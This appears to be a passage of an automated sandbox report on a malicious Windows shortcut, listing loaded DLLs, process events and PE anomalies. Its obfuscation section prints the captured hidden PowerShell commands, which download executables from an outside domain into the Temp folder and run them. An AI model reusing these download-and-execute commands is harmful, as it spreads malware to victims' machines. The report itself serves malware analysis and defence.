Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: IFhqcKaIol.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://badlarrysguitars.com/share/drp.exe -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe)
Source: C:\Users\user\AppData\Local\Temp\nthelper.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Users\user\AppData\Local\Temp\nthelper.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://badlarrysguitars.com/share/drp.exe -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe) Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nthelper.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nthelper.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")Jump to behavior
Source: initial sampleStatic PE information: section where entry point is pointing to: T10B924G
Source: nthelper.exe.3.drStatic PE information: real checksum: 0x19cbc should be: 0x1e859
Source: nthelper.exe.3.drStatic PE information: section name: T10B924G
Source: nthelper.exe.3.drStatic PE information: section name: G8MCUXOZ
Source: nthelper.exe.3.drStatic PE information: section name: Z2TXZQUP
Source: nthelper.exe.3.drStatic PE information: section name: SRW4MTG9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFE7DE000BD pushad ; iretd 0_2_00007FFE7DE000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFE7DE03AD8 push E85B3357h; ret 0_2_00007FFE7DE03AF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFE7DDD00BD pushad ; iretd 3_2_00007FFE7DDD00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFE7DDD0AFD pushad ; retf 3_2_00007FFE7DDD0B02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFE7DDE00BD pushad ; iretd 6_2_00007FFE7DDE00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFE7DDE19CF pushad ; retf 18_2_00007FFE7DDE1A31
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFE7DDE00BD pushad ; iretd 18_2_00007FFE7DDE00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFE7DDE1AA7 pushad ; iretd 18_2_00007FFE7DDE1AB1

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\nthelper.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ctfmoon.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
